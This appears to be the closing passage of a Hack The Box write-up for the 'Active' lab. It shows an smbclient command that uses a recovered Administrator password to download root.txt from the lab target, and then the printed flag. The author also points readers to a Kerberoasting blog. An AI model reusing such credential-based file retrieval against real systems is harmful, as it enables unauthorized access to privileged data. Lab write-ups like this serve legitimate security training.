desktop.ini AHS 282 Mon Jul 30 06:50:10 2018
root.txt AR 34 Tue Jun 2 05:19:11 2026
5217023 blocks of size 4096. 279492 blocks available
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ smbclient //10.129.7.87/Users -U'Administrator'%'Ticketmaster1968' -c 'get Administrator\Desktop\root.txt root.txt'
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ cat root.txt
7cdb36e03c6f6dcd1aca6f6b8a7bf610
Resources
There is not much more to say for this box; you can look at my Kerberoasting blog here.
